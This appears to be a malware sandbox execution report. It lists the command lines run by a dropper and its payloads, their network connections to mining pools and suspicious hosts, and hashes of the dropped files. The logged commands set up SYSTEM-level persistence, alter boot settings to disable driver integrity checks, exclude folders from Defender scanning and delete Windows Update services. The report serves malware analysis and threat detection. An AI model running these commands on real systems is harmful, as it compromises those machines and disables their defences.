"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn NoteUpdateTaskMachineQC /tr "'C:\Program Files\Notepad\Chrome\updater.exe'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {3BF390EF-F9A6-47F6-BF6F-899DFB29A1F7} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Program Files\Notepad\Chrome\updater.exe

"C:\Program Files\Notepad\Chrome\updater.exe"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn NoteUpdateTaskMachineQC /tr "'C:\Program Files\Notepad\Chrome\updater.exe'"

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

C:\Windows\System32\reg.exe

reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe zuhwtyqtfkk

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-321029132353567927-1538182917666872451-14218077525795414386214723311889002673"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController GET Name, VideoProcessor

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe ozascextlcafxrlv

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Windows\system32\schtasks.exe

schtasks /delete /tn "csrss" /f

C:\Windows\system32\schtasks.exe

schtasks /delete /tn "ScheduledUpdate" /f

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 us.imgjeoigaa.com udp
HK 103.100.211.218:80 us.imgjeoigaa.com tcp
RU 5.42.65.80:80 5.42.65.80 tcp
DE 45.9.74.80:80 45.9.74.80 tcp
US 8.8.8.8:53 aa.imgjeoogbb.com udp
HK 154.221.26.108:80 aa.imgjeoogbb.com tcp
NL 45.12.253.56:80 45.12.253.56 tcp
US 8.8.8.8:53 81a8c24e-dfe0-40f3-a0d3-95dbdd686079.uuid.duniadekho.bar udp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 8.8.8.8:53 vsblobprodscussu5shard58.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard58.blob.core.windows.net tcp
US 8.8.8.8:53 server7.duniadekho.bar udp
BG 185.82.216.50:443 server7.duniadekho.bar tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 stun.ipfire.org udp
DE 81.3.27.44:3478 stun.ipfire.org udp
US 8.8.8.8:53 luckytradeone.com udp
US 172.67.181.198:443 luckytradeone.com tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
NL 51.15.55.162:14433 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
PL 51.68.143.81:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 stun1.l.google.com udp
IN 172.253.121.127:19302 stun1.l.google.com udp

Files

SHA512 cb16124dc6ae5d02c99485d867dfdbd4308d393c559f599b7a1ce89168b7040f5237b3a90902718d0cfd08a205bfd518432ea8c438501c4a64a8910d20bd1e89

\Users\Admin\AppData\Local\Temp\1000172001\setup.exe

MD5 a8f1aa449fbfd6e479c388d7bd7a08fd
SHA1 e771e44bffad0958f50eb5d68e94167cc846e2d8
SHA256 1eb17429e41c7e87c070adb5d68a11fa024f4e6598e50062168c44012975c3d4
SHA512 cb16124dc6ae5d02c99485d867dfdbd4308d393c559f599b7a1ce89168b7040f5237b3a90902718d0cfd08a205bfd518432ea8c438501c4a64a8910d20bd1e89

\Users\Admin\AppData\Local\Temp\1000172001\setup.exe

MD5 a8f1aa449fbfd6e479c388d7bd7a08fd
SHA1 e771e44bffad0958f50eb5d68e94167cc846e2d8
SHA256 1eb17429e41c7e87c070adb5d68a11fa024f4e6598e50062168c44012975c3d4
SHA512 cb16124dc6ae5d02c99485d867dfdbd4308d393c559f599b7a1ce89168b7040f5237b3a90902718d0cfd08a205bfd518432ea8c438501c4a64a8910d20bd1e89

\Users\Admin\AppData\Local\Temp\1000172001\setup.exe

MD5 a8f1aa449fbfd6e479c388d7bd7a08fd
SHA1 e771e44bffad0958f50eb5d68e94167cc846e2d8
SHA256 1eb17429e41c7e87c070adb5d68a11fa024f4e6598e50062168c44012975c3d4
SHA512 cb16124dc6ae5d02c99485d867dfdbd4308d393c559f599b7a1ce89168b7040f5237b3a90902718d0cfd08a205bfd518432ea8c438501c4a64a8910d20bd1e89

memory/1756-106-0x00000000003D0000-0x00000000003F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

MD5 a53b97f33623010a204d53ca814e8dd2
SHA1 1c1498af4bfa07fd04b1cc455ed69ca00cebb3c1
SHA256 6ba96ab9e09801ed43485fae7797223a383554397e8de1ea71912cb843794bf0
SHA512 6a342c7816485d60ee8402b4119d0a15895e5610a4b96c1556d9c7cbaf4f8f10bbbce8b7ab081d9bda21788f31e70465ff25b99dae06bf6246ce7b23f03abd1b

memory/1756-116-0x0000000000690000-0x00000000006D0000-memory.dmp

\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

MD5 a53b97f33623010a204d53ca814e8dd2
SHA1 1c1498af4bfa07fd04b1cc455ed69ca00cebb3c1
SHA256 6ba96ab9e09801ed43485fae7797223a383554397e8de1ea71912cb843794bf0
SHA512 6a342c7816485d60ee8402b4119d0a15895e5610a4b96c1556d9c7cbaf4f8f10bbbce8b7ab081d9bda21788f31e70465ff25b99dae06bf6246ce7b23f03abd1b

\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

MD5 a53b97f33623010a204d53ca814e8dd2
SHA1 1c1498af4bfa07fd04b1cc455ed69ca00cebb3c1
SHA256 6ba96ab9e09801ed43485fae7797223a383554397e8de1ea71912cb843794bf0
SHA512 6a342c7816485d60ee8402b4119d0a15895e5610a4b96c1556d9c7cbaf4f8f10bbbce8b7ab081d9bda21788f31e70465ff25b99dae06bf6246ce7b23f03abd1b

C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

MD5 a53b97f33623010a204d53ca814e8dd2
SHA1 1c1498af4bfa07fd04b1cc455ed69ca00cebb3c1
SHA256 6ba96ab9e09801ed43485fae7797223a383554397e8de1ea71912cb843794bf0
SHA512 6a342c7816485d60ee8402b4119d0a15895e5610a4b96c1556d9c7cbaf4f8f10bbbce8b7ab081d9bda21788f31e70465ff25b99dae06bf6246ce7b23f03abd1b

C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

MD5 a53b97f33623010a204d53ca814e8dd2
SHA1 1c1498af4bfa07fd04b1cc455ed69ca00cebb3c1
SHA256 6ba96ab9e09801ed43485fae7797223a383554397e8de1ea71912cb843794bf0
SHA512 6a342c7816485d60ee8402b4119d0a15895e5610a4b96c1556d9c7cbaf4f8f10bbbce8b7ab081d9bda21788f31e70465ff25b99dae06bf6246ce7b23f03abd1b

\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

MD5 a53b97f33623010a204d53ca814e8dd2
SHA1 1c1498af4bfa07fd04b1cc455ed69ca00cebb3c1
SHA256 6ba96ab9e09801ed43485fae7797223a383554397e8de1ea71912cb843794bf0
SHA512 6a342c7816485d60ee8402b4119d0a15895e5610a4b96c1556d9c7cbaf4f8f10bbbce8b7ab081d9bda21788f31e70465ff25b99dae06bf6246ce7b23f03abd1b

memory/1168-131-0x0000000000220000-0x0000000000229000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

MD5 a53b97f33623010a204d53ca814e8dd2
SHA1 1c1498af4bfa07fd04b1cc455ed69ca00cebb3c1
SHA256 6ba96ab9e09801ed43485fae7797223a383554397e8de1ea71912cb843794bf0
SHA512 6a342c7816485d60ee8402b4119d0a15895e5610a4b96c1556d9c7cbaf4f8f10bbbce8b7ab081d9bda21788f31e70465ff25b99dae06bf6246ce7b23f03abd1b

memory/772-129-0x0000000000400000-0x0000000000409000-memory.dmp

memory/772-128-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/772-132-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

memory/1756-143-0x0000000000400000-0x00000000004F3000-memory.dmp

\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

memory/1052-152-0x0000000002570000-0x0000000002968000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

memory/1052-155-0x0000000002970000-0x000000000325B000-memory.dmp

memory/1256-156-0x0000000002A50000-0x0000000002A66000-memory.dmp

memory/772-157-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

memory/1052-164-0x0000000000400000-0x0000000000D1B000-memory.dmp

\Windows\rss\csrss.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

C:\Windows\rss\csrss.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

\Windows\rss\csrss.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

memory/1192-174-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1372-175-0x0000000002F70000-0x00000000030A1000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 13aaafe14eb60d6a718230e82c671d57
SHA1 e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256 f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512 ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 13aaafe14eb60d6a718230e82c671d57
SHA1 e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256 f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512 ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

\Users\Admin\AppData\Local\Temp\dbghelp.dll

MD5 f0616fa8bc54ece07e3107057f74e4db
SHA1 b33995c4f9a004b7d806c4bb36040ee844781fca
SHA256 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026
SHA512 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

\Users\Admin\AppData\Local\Temp\symsrv.dll

MD5 5c399d34d8dc01741269ff1f1aca7554
SHA1 e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256 e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA512 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

memory/1288-195-0x0000000140000000-0x00000001405E8000-memory.dmp

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

memory/1288-214-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/1980-229-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2024-238-0x000000001B050000-0x000000001B332000-memory.dmp

memory/2024-240-0x0000000002330000-0x0000000002338000-memory.dmp

memory/2024-239-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/2024-241-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/2024-243-0x000000000245B000-0x0000000002492000-memory.dmp

memory/2024-242-0x0000000002454000-0x0000000002457000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 36d64d98fd222e9ba7255b4570177ba6
SHA1 d66785b9f575b3973fc8d4310e32fafd28e25c22
SHA256 ad9694dd910b2e9b29fc21e385b10326ae580e58daa1d992e8cf80a43067104e
SHA512 384118b2a9c8153e14e5a4dcbcd7c9cabf6a1ec226c04530021643b67d02505b2680144418e66fa7f2b68ef23ba98aea17d0191430fd69ef8df693798fd39e4c

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3WJEBLJMMMOTL90LHXWG.temp

MD5 36d64d98fd222e9ba7255b4570177ba6
SHA1 d66785b9f575b3973fc8d4310e32fafd28e25c22
SHA256 ad9694dd910b2e9b29fc21e385b10326ae580e58daa1d992e8cf80a43067104e
SHA512 384118b2a9c8153e14e5a4dcbcd7c9cabf6a1ec226c04530021643b67d02505b2680144418e66fa7f2b68ef23ba98aea17d0191430fd69ef8df693798fd39e4c

memory/1620-249-0x000000001B190000-0x000000001B472000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

memory/1620-250-0x0000000001F50000-0x0000000001F58000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

\Users\Admin\AppData\Local\Temp\osloader.exe

